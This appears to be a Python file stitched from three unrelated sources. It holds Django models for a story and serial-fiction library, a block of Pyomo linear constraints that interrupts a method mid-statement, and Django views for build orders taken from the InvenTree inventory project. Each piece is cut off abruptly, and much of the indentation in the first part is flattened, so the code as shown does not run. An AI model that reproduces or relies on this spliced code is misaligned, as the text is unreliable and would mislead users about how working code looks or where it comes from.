user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='lists',
on_delete=models.CASCADE,
)
name = models.CharField(
max_length=70,
)
color = CssField(
default='inherit',
)
priority = models.SmallIntegerField(
default=0,
)
auto_sort = models.BooleanField(
default=True,
)
@property
def entry_count(self):
if not hasattr(self, '_ec'):
self._ec = self.entries.count()
return self._ec
@entry_count.setter
def entry_count(self, value):
self._ec = value
def __str__(self):
return str(self.name)
class Meta:
ordering = ['-priority', 'name']
unique_together = ['user', 'name']
    def clean_fields(self, exclude=None):
        super().clean_fields(exclude)
        # `exclude` may be None, so guard it before the membership test.
        if not exclude or 'color' not in exclude:
            if self.color and not is_css_color(self.color):
                raise ValidationError({'color': ['Not a valid css color.']})
class ListEntry(models.Model):
list = models.ForeignKey(
'List',
related_name='entries',
on_delete=models.CASCADE,
)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
# ordinal = models.SmallIntegerField()
created_at = models.DateTimeField(
auto_now_add=True
)
class Meta:
unique_together = ('list', 'content_type', 'object_id')
verbose_name_plural = 'entries'
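# A minimal usage sketch (illustrative; `_example_add_story_to_list` is a
# hypothetical helper, not part of the schema): attaching an object to a
# user's List goes through the generic relation above.
def _example_add_story_to_list(user_list, story):
    """Add `story` to `user_list`; returns None if it is already there."""
    try:
        return ListEntry.objects.create(list=user_list, content_object=story)
    except IntegrityError:
        # ('list', 'content_type', 'object_id') is unique_together
        return None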
class Source(models.Model):
name = models.CharField(
max_length=150,
)
abbr = models.CharField(
max_length=15,
blank=True,
)
website = models.URLField()
def __str__(self):
return str(self.name)
class Author(models.Model):
name = models.CharField(
max_length=150,
)
slug = models.SlugField(
allow_unicode=True,
max_length=70,
unique=True,
)
email = models.EmailField(
blank=True,
)
homepage = models.URLField(
blank=True,
)
objects = OrderedLowerManager('name')
def __str__(self):
return str(self.name)
def get_absolute_url(self):
return reverse('author', args=[str(self.slug)])
def _perform_unique_checks(self, unique_checks):
errors = super()._perform_unique_checks(unique_checks)
try:
slug = self.slug or get_author_slug(self.name)
conflict = Author.objects \
.filter(slug__iexact=slug) \
.exclude(pk=self.pk) \
.values_list('name', flat=True) \
.get()
err = self.unique_error_message(Author, ('name',))
err.message = 'Existing author "%s" maps to the same slug.' % conflict
errors.setdefault('name', []).append(err)
except Author.DoesNotExist:
pass
return errors
def save(self, *args, **kwargs):
if not self.slug:
self.slug = get_author_slug(self.name)
self.full_clean()
super().save(*args, **kwargs)
class Code(models.Model):
abbr = models.CharField(
primary_key=True,
max_length=4,
)
name = models.CharField(
max_length=50,
blank=True,
)
def __str__(self):
return str(self.abbr)
class Meta:
ordering = ['abbr']
def get_absolute_url(self):
return reverse('code', args=[str(self.abbr)])
class Slant(models.Model):
abbr = models.CharField(
primary_key=True,
max_length=2,
unique=True,
verbose_name='css class',
help_text='This cannot be changed.'
)
# TODO: cast to lowercase?
description = models.CharField(
max_length=50,
)
affinity = models.ForeignKey(
'Code',
verbose_name='code affinity',
on_delete=models.PROTECT,
)
display_order = models.PositiveSmallIntegerField()
def __str__(self):
return str(self.abbr)
class Meta:
ordering = ['display_order']
def get_absolute_url(self):
return reverse('code', args=[str(self.affinity_id)])
class StoryDisplayManager(models.Manager):
def get_queryset(self):
return super().get_queryset() \
.annotate(author_dicts=Story.authors_sq(),
code_abbrs=Story.codes_sq(),
installment_count=Story.installment_count_sq(),
missing_count=Story.missing_count_sq())
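# Usage sketch (illustrative only): Story.display_objects pre-annotates each
# row, so list views can render author names, code abbreviations, and
# installment counts without extra queries, e.g.:
#
#   for story in Story.display_objects.all()[:20]:
#       print(story.title, story.installment_count, story.missing_count)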
class Story(models.Model, AuthorsMixin, CodesMixin):
TITLE_LEN = 150
SLUG_LEN = 70
source = models.ForeignKey(
'Source',
related_name='stories',
on_delete=models.SET_NULL,
blank=True,
null=True,
)
title = models.CharField(
max_length=TITLE_LEN,
)
sort_title = models.CharField(
max_length=TITLE_LEN,
)
slug = models.SlugField(
max_length=SLUG_LEN,
unique=True,
# allow_unicode=True,
)
authors = models.ManyToManyField(Author, related_name='stories')
published_on = models.DateField(
blank=True,
null=True,
)
updated_on = models.DateField(
blank=True,
null=True,
)
added_at = models.DateTimeField(
auto_now_add=True,
)
removed_at = models.DateTimeField(
blank=True,
null=True,
)
slant = models.ForeignKey(
'Slant',
related_name='stories',
on_delete=models.PROTECT,
blank=True,
null=True,
)
codes = models.ManyToManyField(
Code,
related_name='stories',
blank=True,
)
synopsis = models.TextField(
blank=True,
)
list_entries = GenericRelation(ListEntry, related_query_name='story')
def user_lists(self, user):
entries = self.list_entries \
.select_related('list') \
.filter(list__user=user) \
.order_by('-list__priority', 'list__name') \
.all()
return [entry.list for entry in entries]
@property
def author_list(self):
return self.authors.all()
@property
def code_list(self):
return self.codes.all()
@property
def slant_cls(self):
return self.slant_id
@property
def installment_count(self):
if not hasattr(self, '_ic'):
self._ic = self.current_installments.count()
return self._ic
@installment_count.setter
def installment_count(self, value):
self._ic = value
@property
def missing_count(self):
return 1 if not self.installment_count else self._mc
@missing_count.setter
def missing_count(self, value):
self._mc = value
@cached_property
def valid_installment_count(self):
return self.current_installments.exclude(file='').count()
@cached_property
def current_installments(self):
# return [inst for inst in self.installments.all() if inst.is_current]
return self.installments.filter(is_current=True).order_by('ordinal')
# @cached_property
# def installment_dates(self):
# return self.installments.values('ordinal').annotate(
# date_published=Min('published_on'),
# date_updated=Max('published_on'),
# )
@cached_property
def installment_dates(self):
qs = self.installments \
.values('ordinal') \
.order_by('ordinal') \
.annotate(date_published=Min('published_on'),
date_updated=Max('published_on'))
return {
d['ordinal']: {
'date_published': d['date_published'],
'date_updated': d['date_updated'],
}
for d in qs
}
@cached_property
def first_ordinal(self):
try:
return self.current_installments \
.exclude(file='') \
.order_by('ordinal') \
.values_list('ordinal', flat=True)[0]
except IndexError:
return None
@cached_property
def last_ordinal(self):
try:
return self.current_installments \
.exclude(file='') \
.order_by('-ordinal') \
.values_list('ordinal', flat=True)[0]
except IndexError:
return None
objects = models.Manager()
display_objects = StoryDisplayManager()
def __str__(self):
return str(self.title)
class Meta:
ordering = ['sort_title', 'published_on']
verbose_name_plural = 'stories'
@staticmethod
def authors_sq(separator=DEFAULT_AUTHOR_SEP):
return Subquery(Author.objects
.order_by()
.filter(stories__pk=OuterRef('pk'))
.annotate(names=Concat('name', separator=separator))
.values('names')
)
@staticmethod
def codes_sq():
return Subquery(Code.objects
.order_by()
.filter(stories__pk=OuterRef('pk'))
.annotate(abbrs=Concat('abbr'))
.values('abbrs')
)
@staticmethod
def installment_count_sq():
return SQCount(Installment.objects
.order_by()
.filter(story=OuterRef('pk'),
is_current=True)
.values('pk')
)
@staticmethod
def missing_count_sq():
return SQCount(Installment.objects
.filter(story__pk=OuterRef('pk'),
is_current=True,
file='')
.values('pk')
)
def get_absolute_url(self):
return reverse('story', args=[str(self.slug)])
def save(self, *args, **kwargs):
if not self.sort_title:
self.sort_title = get_sort_name(self.title)[:self.TITLE_LEN]
self.full_clean()
if not self.updated_on:
self.updated_on = self.published_on
super().save(*args, **kwargs)
class Installment(models.Model):
TITLE_LEN = 125
LU_WORDS = 'w'
LU_CHARS = 'c'
LU_CHOICES = (
(LU_WORDS, 'words'),
(LU_CHARS, 'chars'),
)
FMT_HTML = 'html'
FMT_MD = 'md'
FMT_RST = 'rst'
FMT_TXT = 'txt'
FMT_CHOICES = (
(FMT_HTML, 'HTML'),
(FMT_MD, 'Markdown'),
(FMT_RST, 'reStructuredText'),
(FMT_TXT, 'Plain Text'),
)
story = models.ForeignKey(
'Story',
related_name='installments',
on_delete=models.CASCADE,
)
ordinal = models.SmallIntegerField()
is_current = models.BooleanField(
default=True,
)
title = models.CharField(
max_length=TITLE_LEN,
)
authors = models.ManyToManyField(Author)
published_on = models.DateField()
added_at = models.DateTimeField(
auto_now_add=True,
)
length = models.IntegerField(
default=0,
)
length_unit = models.CharField(
max_length=1,
choices=LU_CHOICES,
default=LU_WORDS,
)
file = models.FileField(
# see: library.util.story_path
# PREFIX + LETTER + 2xSLUG + ordinal + date + ext
max_length=15 + 2 + 2*(Story.SLUG_LEN+1) + 4 + 11 + 5
)
checksum = models.CharField(
max_length=64,
blank=True,
)
@property
def file_as_html(self):
if self.file:
# seems some storage providers only return bytes
with self.file.open(mode='rb') as f:
html = f.read()
return html.decode('utf-8')
else:
return None
@file_as_html.setter
def file_as_html(self, value):
assert isinstance(value, str), 'Expected a string; cannot delete here.'
if not value:
return
buf = BytesIO(value.encode('utf-8'))
checksum = b64md5sum(buf)
if checksum != self.checksum:
buf.seek(0)
file_path = inst_path(self.story.slug, self.ordinal, self.published_on)
self.file.save(file_path, buf)
self.checksum = checksum
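    # Illustrative round trip: assigning the same HTML twice writes the file
    # only once, because the base64 MD5 checksum matches on the second set.
    #
    #   inst.file_as_html = "<p>hello</p>"  # writes a new file, sets checksum
    #   inst.file_as_html = "<p>hello</p>"  # no-op: checksum unchanged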
@cached_property
def versions(self):
        # NOTE: this is only worthwhile if prefetching all versions of all installments
installments = self.story.installments.all()
versions = [inst for inst in installments if inst.ordinal == self.ordinal]
# return sorted(versions, key=lambda inst: inst.published_on)
return versions
# return self.story.installments.filter(ordinal=self.ordinal)
@property
def exists(self):
return True if self.file else False
@property
def date_published(self):
dates = self.story.installment_dates[self.ordinal]
return dates['date_published'] if dates['date_published'].year > 1 else None
# return self.versions[0].published_on
@property
def date_updated(self):
dates = self.story.installment_dates[self.ordinal]
published_on = dates['date_published']
updated_on = dates['date_updated']
return updated_on if updated_on != published_on else None
# published_on = self.date_published_on
# updated_on = self.versions[-1].published_on
# return updated_on if updated_on != published_on else None
@property
def story_str(self):
return '{} [{:03d}]'.format(self.story.title, self.ordinal)
def __str__(self):
return '{} [{:03d}] ~ {}'.format(self.story.title, self.ordinal, self.title)
class Meta:
unique_together = ('story', 'ordinal', 'published_on')
@staticmethod
def _ord_seeker(forward=True):
qs = Installment.objects \
.filter(story__pk=OuterRef('story__pk'), is_current=True) \
.exclude(file='') \
.values_list('ordinal', flat=True)
if forward:
return qs.filter(ordinal__gt=OuterRef('ordinal')).order_by('ordinal')
else:
return qs.filter(ordinal__lt=OuterRef('ordinal')).order_by('-ordinal')
@staticmethod
def prev_sq():
return Subquery(Installment._ord_seeker(False)[:1])
@staticmethod
def next_sq():
return Subquery(Installment._ord_seeker(True)[:1])
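    # Usage sketch (illustrative only): annotate a queryset with the
    # neighbouring readable ordinals so a reader view can link the previous
    # and next installments:
    #
    #   qs = Installment.objects.annotate(prev=Installment.prev_sq(),
    #                                     next=Installment.next_sq())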
def get_absolute_url(self):
return reverse('installment', args=[str(self.story.slug), int(self.ordinal)])
def save(self, *args, **kwargs):
# TODO: fixup is_current
super().save(*args, **kwargs)
class SagaDisplayManager(models.Manager):
def get_queryset(self):
return super().get_queryset() \
.annotate(author_dicts=Saga.authors_sq(),
code_abbrs=Saga.codes_sq(),
updated_on=Saga.updated_on_sq(),
entry_count=Saga.entry_count_sq())
class Saga(models.Model, AuthorsMixin, CodesMixin):
slug = ShortUUIDField(
primary_key=True,
)
name = models.CharField(
max_length=Story.TITLE_LEN,
)
sort_name = models.CharField(
max_length=Story.TITLE_LEN,
)
synopsis = models.TextField()
stories = models.ManyToManyField(
'Story',
through='SagaEntry',
related_name='sagas',
)
@property
def stories_ordered(self):
return Story.display_objects \
.filter(sagaentry__saga=self) \
.order_by('sagaentry__order')
@property
def entry_count(self):
if not hasattr(self, '_ec'):
self._ec = self.stories.count()
return self._ec
@entry_count.setter
def entry_count(self, value):
self._ec = value
@property
def current_index(self):
return self._ci
@current_index.setter
def current_index(self, value):
self._ci = value
@cached_property
def prev_entry(self):
if self.current_index and 1 < self.current_index:
# current_index is 1-indexed
return self.stories_ordered.all()[self.current_index-2]
return None
@cached_property
def next_entry(self):
if self.current_index and self.current_index < self.entry_count:
# current_index is 1-indexed
return self.stories_ordered.all()[self.current_index]
return None
objects = models.Manager()
display_objects = SagaDisplayManager()
def __str__(self):
return '{} [{}]'.format(self.name, self.slug)
class Meta:
ordering = ['sort_name']
def get_absolute_url(self):
return reverse('saga', args=[str(self.slug)])
def save(self, *args, **kwargs):
if not self.sort_name:
self.sort_name = get_sort_name(self.name)[:Story.TITLE_LEN]
# TODO: is this safe? no, it's not...
while True:
try:
super().save(*args, **kwargs)
break
except IntegrityError:
self.slug = ShortUUIDField.gen()
@staticmethod
def authors_sq(separator=DEFAULT_AUTHOR_SEP):
return Subquery(Author.objects
.order_by()
.filter(stories__sagas__pk=OuterRef('pk'))
.annotate(names=Concat('name', separator=separator))
.values('names')
)
@staticmethod
def codes_sq():
return Subquery(Code.objects
.order_by()
.filter(stories__sagas__pk=OuterRef('pk'))
.annotate(abbrs=Concat('abbr', distinct=True))
.values('abbrs')
)
@staticmethod
def updated_on_sq():
        return Subquery(Installment.objects
m.x3716 - m.x3717 - m.x3718
- m.x3719 - m.x3720 - m.x3721 - m.x3722 - m.x3723 - m.x3724 - m.x3725 - m.x3726 - m.x3727
- m.x3728 - m.x3729 - m.x3730 - m.x3731 - m.x3732 - m.x3733 - m.x3734 - m.x3735 - m.x3736
- m.x3737 - m.x3738 - m.x3739 - m.x3740 - m.x3741 - m.x3742 - m.x3743 - m.x3744 - m.x3745
- m.x3746 - m.x3747 - m.x3748 - m.x3749 - m.x3750 - m.x3751 + m.x4324 == 0)
m.c2562 = Constraint(expr= - m.x3752 - m.x3753 - m.x3754 - m.x3755 - m.x3756 - m.x3757 - m.x3758 - m.x3759 - m.x3760
- m.x3761 - m.x3762 - m.x3763 - m.x3764 - m.x3765 - m.x3766 - m.x3767 - m.x3768 - m.x3769
- m.x3770 - m.x3771 - m.x3772 - m.x3773 - m.x3774 - m.x3775 - m.x3776 - m.x3777 - m.x3778
- m.x3779 - m.x3780 - m.x3781 - m.x3782 - m.x3783 - m.x3784 - m.x3785 - m.x3786 - m.x3787
- m.x3788 - m.x3789 - m.x3790 - m.x3791 - m.x3792 - m.x3793 + m.x4325 == 0)
m.c2563 = Constraint(expr= - m.x3794 - m.x3795 - m.x3796 - m.x3797 - m.x3798 - m.x3799 - m.x3800 - m.x3801 - m.x3802
- m.x3803 - m.x3804 - m.x3805 - m.x3806 - m.x3807 - m.x3808 - m.x3809 - m.x3810 - m.x3811
- m.x3812 - m.x3813 - m.x3814 - m.x3815 - m.x3816 - m.x3817 - m.x3818 - m.x3819 - m.x3820
- m.x3821 - m.x3822 - m.x3823 - m.x3824 - m.x3825 - m.x3826 - m.x3827 - m.x3828 - m.x3829
- m.x3830 - m.x3831 - m.x3832 - m.x3833 - m.x3834 - m.x3835 + m.x4326 == 0)
m.c2564 = Constraint(expr= - m.x3836 - m.x3837 - m.x3838 - m.x3839 - m.x3840 - m.x3841 - m.x3842 - m.x3843 - m.x3844
- m.x3845 - m.x3846 - m.x3847 - m.x3848 - m.x3849 - m.x3850 - m.x3851 - m.x3852 - m.x3853
- m.x3854 - m.x3855 - m.x3856 - m.x3857 - m.x3858 - m.x3859 - m.x3860 - m.x3861 - m.x3862
- m.x3863 - m.x3864 - m.x3865 - m.x3866 - m.x3867 - m.x3868 - m.x3869 - m.x3870 - m.x3871
- m.x3872 - m.x3873 - m.x3874 - m.x3875 - m.x3876 - m.x3877 + m.x4327 == 0)
m.c2565 = Constraint(expr= - m.x3878 - m.x3879 - m.x3880 - m.x3881 - m.x3882 - m.x3883 - m.x3884 - m.x3885 - m.x3886
- m.x3887 - m.x3888 - m.x3889 - m.x3890 - m.x3891 - m.x3892 - m.x3893 - m.x3894 - m.x3895
- m.x3896 - m.x3897 - m.x3898 - m.x3899 - m.x3900 - m.x3901 - m.x3902 - m.x3903 - m.x3904
- m.x3905 - m.x3906 - m.x3907 - m.x3908 - m.x3909 - m.x3910 - m.x3911 - m.x3912 - m.x3913
- m.x3914 - m.x3915 - m.x3916 - m.x3917 + m.x4328 == 0)
m.c2566 = Constraint(expr= - m.x3918 - m.x3919 - m.x3920 - m.x3921 - m.x3922 - m.x3923 - m.x3924 - m.x3925 - m.x3926
- m.x3927 - m.x3928 - m.x3929 - m.x3930 - m.x3931 - m.x3932 - m.x3933 - m.x3934 - m.x3935
- m.x3936 - m.x3937 - m.x3938 - m.x3939 - m.x3940 - m.x3941 - m.x3942 - m.x3943 - m.x3944
- m.x3945 - m.x3946 - m.x3947 - m.x3948 - m.x3949 - m.x3950 - m.x3951 - m.x3952 - m.x3953
- m.x3954 - m.x3955 - m.x3956 - m.x3957 + m.x4329 == 0)
m.c2567 = Constraint(expr= - m.x3958 - m.x3959 - m.x3960 - m.x3961 - m.x3962 - m.x3963 - m.x3964 - m.x3965 - m.x3966
- m.x3967 - m.x3968 - m.x3969 - m.x3970 - m.x3971 - m.x3972 - m.x3973 - m.x3974 - m.x3975
- m.x3976 - m.x3977 - m.x3978 - m.x3979 - m.x3980 - m.x3981 - m.x3982 - m.x3983 - m.x3984
- m.x3985 - m.x3986 - m.x3987 - m.x3988 - m.x3989 - m.x3990 + m.x4330 == 0)
m.c2568 = Constraint(expr= - m.x3991 - m.x3992 - m.x3993 - m.x3994 - m.x3995 - m.x3996 - m.x3997 - m.x3998 - m.x3999
- m.x4000 - m.x4001 - m.x4002 - m.x4003 - m.x4004 - m.x4005 - m.x4006 - m.x4007 - m.x4008
- m.x4009 - m.x4010 - m.x4011 - m.x4012 - m.x4013 - m.x4014 - m.x4015 - m.x4016 - m.x4017
- m.x4018 - m.x4019 - m.x4020 - m.x4021 - m.x4022 - m.x4023 + m.x4331 == 0)
m.c2569 = Constraint(expr= - m.x4024 - m.x4025 - m.x4026 - m.x4027 - m.x4028 - m.x4029 - m.x4030 - m.x4031 - m.x4032
- m.x4033 - m.x4034 - m.x4035 - m.x4036 - m.x4037 - m.x4038 - m.x4039 - m.x4040 - m.x4041
- m.x4042 - m.x4043 - m.x4044 - m.x4045 - m.x4046 - m.x4047 - m.x4048 - m.x4049 - m.x4050
- m.x4051 - m.x4052 - m.x4053 - m.x4054 - m.x4055 - m.x4056 - m.x4057 - m.x4058 - m.x4059
- m.x4060 - m.x4061 - m.x4062 - m.x4063 - m.x4064 - m.x4065 - m.x4066 + m.x4332 == 0)
m.c2570 = Constraint(expr= - m.x3710 - m.x3711 - m.x3712 - m.x3713 - m.x3714 - m.x3715 - m.x3716 - m.x3717 - m.x3718
- m.x3719 - m.x3720 - m.x3721 - m.x3722 - m.x3723 - m.x3724 - m.x3725 - m.x3726 - m.x3727
- m.x3728 - m.x3729 - m.x3730 - m.x3731 - m.x3732 - m.x3733 - m.x3734 - m.x3735 - m.x3736
- m.x3737 - m.x3738 - m.x3739 - m.x3740 - m.x3741 - m.x3742 - m.x3743 - m.x3744 - m.x3745
- m.x3746 - m.x3747 - m.x3748 - m.x3749 - m.x3750 - m.x3751 - m.x3752 - m.x3753 - m.x3754
- m.x3755 - m.x3756 - m.x3757 - m.x3758 - m.x3759 - m.x3760 - m.x3761 - m.x3762 - m.x3763
- m.x3764 - m.x3765 - m.x3766 - m.x3767 - m.x3768 - m.x3769 - m.x3770 - m.x3771 - m.x3772
- m.x3773 - m.x3774 - m.x3775 - m.x3776 - m.x3777 - m.x3778 - m.x3779 - m.x3780 - m.x3781
- m.x3782 - m.x3783 - m.x3784 - m.x3785 - m.x3786 - m.x3787 - m.x3788 - m.x3789 - m.x3790
- m.x3791 - m.x3792 - m.x3793 - m.x3794 - m.x3795 - m.x3796 - m.x3797 - m.x3798 - m.x3799
- m.x3800 - m.x3801 - m.x3802 - m.x3803 - m.x3804 - m.x3805 - m.x3806 - m.x3807 - m.x3808
- m.x3809 - m.x3810 - m.x3811 - m.x3812 - m.x3813 - m.x3814 - m.x3815 - m.x3816 - m.x3817
- m.x3818 - m.x3819 - m.x3820 - m.x3821 - m.x3822 - m.x3823 - m.x3824 - m.x3825 - m.x3826
- m.x3827 - m.x3828 - m.x3829 - m.x3830 - m.x3831 - m.x3832 - m.x3833 - m.x3834 - m.x3835
- m.x3836 - m.x3837 - m.x3838 - m.x3839 - m.x3840 - m.x3841 - m.x3842 - m.x3843 - m.x3844
- m.x3845 - m.x3846 - m.x3847 - m.x3848 - m.x3849 - m.x3850 - m.x3851 - m.x3852 - m.x3853
- m.x3854 - m.x3855 - m.x3856 - m.x3857 - m.x3858 - m.x3859 - m.x3860 - m.x3861 - m.x3862
- m.x3863 - m.x3864 - m.x3865 - m.x3866 - m.x3867 - m.x3868 - m.x3869 - m.x3870 - m.x3871
- m.x3872 - m.x3873 - m.x3874 - m.x3875 - m.x3876 - m.x3877 - m.x3878 - m.x3879 - m.x3880
- m.x3881 - m.x3882 - m.x3883 - m.x3884 - m.x3885 - m.x3886 - m.x3887 - m.x3888 - m.x3889
- m.x3890 - m.x3891 - m.x3892 - m.x3893 - m.x3894 - m.x3895 - m.x3896 - m.x3897 - m.x3898
- m.x3899 - m.x3900 - m.x3901 - m.x3902 - m.x3903 - m.x3904 - m.x3905 - m.x3906 - m.x3907
- m.x3908 - m.x3909 - m.x3910 - m.x3911 - m.x3912 - m.x3913 - m.x3914 - m.x3915 - m.x3916
- m.x3917 - m.x3918 - m.x3919 - m.x3920 - m.x3921 - m.x3922 - m.x3923 - m.x3924 - m.x3925
- m.x3926 - m.x3927 - m.x3928 - m.x3929 - m.x3930 - m.x3931 - m.x3932 - m.x3933 - m.x3934
- m.x3935 - m.x3936 - m.x3937 - m.x3938 - m.x3939 - m.x3940 - m.x3941 - m.x3942 - m.x3943
- m.x3944 - m.x3945 - m.x3946 - m.x3947 - m.x3948 - m.x3949 - m.x3950 - m.x3951 - m.x3952
- m.x3953 - m.x3954 - m.x3955 - m.x3956 - m.x3957 - m.x3958 - m.x3959 - m.x3960 - m.x3961
- m.x3962 - m.x3963 - m.x3964 - m.x3965 - m.x3966 - m.x3967 - m.x3968 - m.x3969 - m.x3970
    - m.x3971 -
"""
Django views for interacting with Build objects
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.core.exceptions import ValidationError
from django.views.generic import DetailView, ListView, UpdateView
from django.forms import HiddenInput
from django.urls import reverse
from part.models import Part
from .models import Build, BuildItem, BuildOrderAttachment
from . import forms
from stock.models import StockLocation, StockItem
from InvenTree.views import AjaxUpdateView, AjaxCreateView, AjaxDeleteView
from InvenTree.views import InvenTreeRoleMixin
from InvenTree.helpers import str2bool, extract_serial_numbers, normalize
from InvenTree.status_codes import BuildStatus
class BuildIndex(InvenTreeRoleMixin, ListView):
""" View for displaying list of Builds
"""
model = Build
template_name = 'build/index.html'
context_object_name = 'builds'
role_required = 'build.view'
def get_queryset(self):
""" Return all Build objects (order by date, newest first) """
return Build.objects.order_by('status', '-completion_date')
def get_context_data(self, **kwargs):
context = super(BuildIndex, self).get_context_data(**kwargs).copy()
context['BuildStatus'] = BuildStatus
context['active'] = self.get_queryset().filter(status__in=BuildStatus.ACTIVE_CODES)
context['completed'] = self.get_queryset().filter(status=BuildStatus.COMPLETE)
context['cancelled'] = self.get_queryset().filter(status=BuildStatus.CANCELLED)
return context
class BuildCancel(AjaxUpdateView):
""" View to cancel a Build.
Provides a cancellation information dialog
"""
model = Build
ajax_template_name = 'build/cancel.html'
ajax_form_title = _('Cancel Build')
context_object_name = 'build'
form_class = forms.CancelBuildForm
role_required = 'build.change'
def validate(self, build, form, **kwargs):
confirm = str2bool(form.cleaned_data.get('confirm_cancel', False))
if not confirm:
form.add_error('confirm_cancel', _('Confirm build cancellation'))
def save(self, build, form, **kwargs):
"""
Cancel the build.
"""
build.cancelBuild(self.request.user)
def get_data(self):
return {
'danger': _('Build was cancelled')
}
class BuildAutoAllocate(AjaxUpdateView):
""" View to auto-allocate parts for a build.
Follows a simple set of rules to automatically allocate StockItem objects.
Ref: build.models.Build.getAutoAllocations()
"""
model = Build
form_class = forms.AutoAllocateForm
context_object_name = 'build'
ajax_form_title = _('Allocate Stock')
ajax_template_name = 'build/auto_allocate.html'
role_required = 'build.change'
def get_initial(self):
"""
Initial values for the form.
"""
initials = super().get_initial()
# Pointing to a particular build output?
output = self.get_param('output')
if output:
try:
output = StockItem.objects.get(pk=output)
initials['output'] = output
except (ValueError, StockItem.DoesNotExist):
pass
return initials
def get_context_data(self, *args, **kwargs):
"""
Get the context data for form rendering.
"""
context = {}
build = self.get_object()
form = self.get_form()
output_id = form['output'].value()
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
output = None
if output:
context['output'] = output
context['allocations'] = build.getAutoAllocations(output)
context['build'] = build
return context
def get_form(self):
form = super().get_form()
if form['output'].value():
# Hide the 'output' field
form.fields['output'].widget = HiddenInput()
return form
def validate(self, build, form, **kwargs):
output = form.cleaned_data.get('output', None)
if not output:
form.add_error(None, _('Build output must be specified'))
def save(self, build, form, **kwargs):
"""
Once the form has been validated,
perform auto-allocations
"""
output = form.cleaned_data.get('output', None)
build.autoAllocate(output)
def get_data(self):
return {
'success': _('Allocated stock to build output'),
}
class BuildOutputCreate(AjaxUpdateView):
"""
Create a new build output (StockItem) for a given build.
"""
model = Build
form_class = forms.BuildOutputCreateForm
ajax_template_name = 'build/build_output_create.html'
ajax_form_title = _('Create Build Output')
role_required = 'build.change'
def validate(self, build, form, **kwargs):
"""
Validation for the form:
"""
quantity = form.cleaned_data.get('output_quantity', None)
serials = form.cleaned_data.get('serial_numbers', None)
# Check that the serial numbers are valid
if serials:
try:
extracted = extract_serial_numbers(serials, quantity)
if extracted:
# Check for conflicting serial numbers
conflicts = build.part.find_conflicting_serial_numbers(extracted)
if len(conflicts) > 0:
msg = ",".join([str(c) for c in conflicts])
form.add_error(
'serial_numbers',
_('Serial numbers already exist') + ': ' + msg,
)
except ValidationError as e:
form.add_error('serial_numbers', e.messages)
else:
# If no serial numbers are provided, should they be?
if build.part.trackable:
form.add_error('serial_numbers', _('Serial numbers required for trackable build output'))
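    # Note: `extract_serial_numbers` expands the user-supplied string into a
    # list of serial numbers (e.g. a range expression such as "1-5" becoming
    # [1, 2, 3, 4, 5]); the exact grammar is defined in InvenTree.helpers,
    # and a ValidationError is raised for strings it cannot parse.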
def save(self, build, form, **kwargs):
"""
Create a new build output
"""
data = form.cleaned_data
quantity = data.get('output_quantity', None)
batch = data.get('batch', None)
serials = data.get('serial_numbers', None)
if serials:
serial_numbers = extract_serial_numbers(serials, quantity)
else:
serial_numbers = None
build.create_build_output(
quantity,
serials=serial_numbers,
batch=batch,
)
def get_initial(self):
initials = super().get_initial()
build = self.get_object()
# Calculate the required quantity
quantity = max(0, build.remaining - build.incomplete_count)
initials['quantity'] = quantity
return initials
def get_form(self):
build = self.get_object()
part = build.part
context = self.get_form_kwargs()
        # Pass the 'build' through to the form,
        # so the form can add the next serial number as a placeholder
context['build'] = build
form = self.form_class(**context)
# If the part is not trackable, hide the serial number input
if not part.trackable:
form.fields['serial_numbers'].widget = HiddenInput()
return form
class BuildOutputDelete(AjaxUpdateView):
"""
Delete a build output (StockItem) for a given build.
Form is a simple confirmation dialog
"""
model = Build
form_class = forms.BuildOutputDeleteForm
ajax_form_title = _('Delete Build Output')
role_required = 'build.delete'
def get_initial(self):
initials = super().get_initial()
output = self.get_param('output')
initials['output_id'] = output
return initials
def validate(self, build, form, **kwargs):
data = form.cleaned_data
confirm = data.get('confirm', False)
if not confirm:
form.add_error('confirm', _('Confirm unallocation of build stock'))
form.add_error(None, _('Check the confirmation box'))
output_id = data.get('output_id', None)
output = None
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
pass
if output:
if output.build != build:
form.add_error(None, _('Build output does not match build'))
else:
form.add_error(None, _('Build output must be specified'))
def save(self, build, form, **kwargs):
output_id = form.cleaned_data.get('output_id')
output = StockItem.objects.get(pk=output_id)
build.deleteBuildOutput(output)
def get_data(self):
return {
'danger': _('Build output deleted'),
}
class BuildUnallocate(AjaxUpdateView):
""" View to un-allocate all parts from a build.
Provides a simple confirmation dialog with a BooleanField checkbox.
"""
model = Build
form_class = forms.UnallocateBuildForm
ajax_form_title = _("Unallocate Stock")
ajax_template_name = "build/unallocate.html"
role_required = 'build.change'
def get_initial(self):
initials = super().get_initial()
# Pointing to a particular build output?
output = self.get_param('output')
if output:
initials['output_id'] = output
# Pointing to a particular part?
part = self.get_param('part')
if part:
initials['part_id'] = part
return initials
def post(self, request, *args, **kwargs):
build = self.get_object()
form = self.get_form()
confirm = str2bool(request.POST.get('confirm', False))
output_id = request.POST.get('output_id', None)
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
output = None
part_id = request.POST.get('part_id', None)
try:
part = Part.objects.get(pk=part_id)
except (ValueError, Part.DoesNotExist):
part = None
valid = False
if not confirm:
form.add_error('confirm', _('Confirm unallocation of build stock'))
form.add_error(None, _('Check the confirmation box'))
else:
build.unallocateStock(output=output, part=part)
valid = True
data = {
'form_valid': valid,
}
return self.renderJsonResponse(request, form, data)
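# Illustrative note (not from the original source): the post() handler
# above expects a payload along these lines (values hypothetical):
#   confirm=1&output_id=123&part_id=45
# Both 'output_id' and 'part_id' are optional; a missing or invalid id
# resolves to None, in which case unallocateStock() presumably
# unallocates across the whole build (or part) rather than one output.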
class BuildComplete(AjaxUpdateView):
"""
View to mark the build as complete.
Requirements:
- There can be no outstanding build outputs
- The "completed" value must meet or exceed the "quantity" value
"""
model = Build
form_class = forms.CompleteBuildForm
role_required = 'build.change'
ajax_form_title = _('Complete Build Order')
ajax_template_name = 'build/complete.html'
def validate(self, build, form, **kwargs):
if not build.can_complete:
form.add_error(None, _('Build order cannot be completed'))
def save(self, build, form, **kwargs):
"""
Perform the build completion step
"""
build.complete_build(self.request.user)
def get_data(self):
return {
